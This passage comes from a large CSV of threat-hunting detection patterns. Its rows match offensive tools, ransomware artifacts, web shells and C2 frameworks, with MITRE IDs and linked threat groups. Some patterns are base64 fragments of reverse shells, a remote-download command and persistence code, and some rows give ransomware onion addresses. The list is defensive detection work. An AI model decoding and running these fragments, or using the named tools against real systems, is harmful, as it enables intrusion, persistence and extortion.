scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","49975" "*Ivy_1*_darwin_amd64*",".{0,1000}Ivy_1.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#linux","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49976" "*Ivy_1*_linux_amd64*",".{0,1000}Ivy_1.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#linux","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49977" "*Ivy_1*_windows_amd64.exe*",".{0,1000}Ivy_1.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49978" "*Ivy-main.zip*",".{0,1000}Ivy\-main\.zip.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49979" 
"*iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad.onion*",".{0,1000}iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49980" "*iwantmore.pizza/posts/PEzor.html*",".{0,1000}iwantmore\.pizza\/posts\/PEzor\.html.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","49981" "*iwork2john.py*",".{0,1000}iwork2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","49982" "*IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwppbXBvcnQgZG5zLnJlc29sdmVyCmltcG9ydCBvcwppbXBvcnQgcmFuZG9tCmltcG9ydCB0aW1lCgo=*",".{0,1000}IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwppbXBvcnQgZG5zLnJlc29sdmVyCmltcG9ydCBvcwppbXBvcnQgcmFuZG9tCmltcG9ydCB0aW1lCgo\=.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#base64","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","49984" 
"*IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lO*",".{0,1000}IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lO.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","49985" "*IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX*",".{0,1000}IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","49986" "*j.jasonm@yandex.com*",".{0,1000}j\.jasonm\@yandex\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49987" "*j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad.onion*",".{0,1000}j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49988" 
"*JAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ASwBEAG8AdAAyADIANwAvA*",".{0,1000}JAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ASwBEAG8AdAAyADIANwAvA.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","49989" "*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*",".{0,1000}JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","49990" 
"*JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu*",".{0,1000}JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#base64","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","49991" "*JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA*",".{0,1000}JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - 
TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","49992" "*JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB*",".{0,1000}JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","#base64","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","49993" "*jackdaw --*",".{0,1000}jackdaw\s\-\-.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","49994" "*jackdaw.py*",".{0,1000}jackdaw\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","49995" "*jackit --reset --debug*",".{0,1000}jackit\s\-\-reset\s\-\-debug.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49996" "*jackson5sec/ShimDB*",".{0,1000}jackson5sec\/ShimDB.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","49997" "*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*",".{0,1000}jaeles\sscan\s\-s\sbigip\-cve\-2020\-5902\.yaml\s\-U\shttps_url\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49998" "*jakobfriedl/precompiled-binaries*",".{0,1000}jakobfriedl\/precompiled\-binaries.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - 
TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50000" "*jakoby.lol/fbi*",".{0,1000}jakoby\.lol\/fbi.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","50001" "*janoglezcampos/rust_syscalls*",".{0,1000}janoglezcampos\/rust_syscalls.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","50002" "*jaredhaight/PSAttackBuildTool*",".{0,1000}jaredhaight\/PSAttackBuildTool.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","50003" "*jas502n/bypassAV*",".{0,1000}jas502n\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","50004" "*jas502n/CVE-2020-5902*",".{0,1000}jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","50005" "*Jasmin Decryptor.csproj*",".{0,1000}Jasmin\sDecryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware 
attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50006" "*Jasmin Decryptor.exe*",".{0,1000}Jasmin\sDecryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50007" "*Jasmin Decryptor.pdb*",".{0,1000}Jasmin\sDecryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50008" "*Jasmin Decryptor.sln*",".{0,1000}Jasmin\sDecryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50009" "*Jasmin Encryptor.csproj*",".{0,1000}Jasmin\sEncryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50010" "*Jasmin 
Encryptor.exe*",".{0,1000}Jasmin\sEncryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50011" "*Jasmin Encryptor.sln*",".{0,1000}Jasmin\sEncryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50012" "*Jasmin Encryptor\bin\Release*",".{0,1000}Jasmin\sEncryptor\\bin\\Release.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50013" "*Jasmin Ransomware C2 Checkin*",".{0,1000}Jasmin\sRansomware\sC2\sCheckin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50014" "*Jasmin%20Decryptor.exe*",".{0,1000}Jasmin\%20Decryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50015" "*Jasmin%20Decryptor.pdb*",".{0,1000}Jasmin\%20Decryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50016" "*Jasmin%20Encryptor.exe*",".{0,1000}Jasmin\%20Encryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50017" "*Jasmin_Decryptor.mainform*",".{0,1000}Jasmin_Decryptor\.mainform.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50018" "*Jasmin_Decryptor.Properties*",".{0,1000}Jasmin_Decryptor\.Properties.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50019" 
"*'jasminadmin'@'localhost'*",".{0,1000}\'jasminadmin\'\@\'localhost\'.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50020" "*jasmin-ransomware-master*",".{0,1000}jasmin\-ransomware\-master.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50021" "*jasonxtn/Argus*",".{0,1000}jasonxtn\/Argus.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","1","N/A","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","50022" "*jatayu.php*",".{0,1000}jatayu\.php.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","50023" "*jatayu-image.png*",".{0,1000}jatayu\-image\.png.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","50024" "*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth 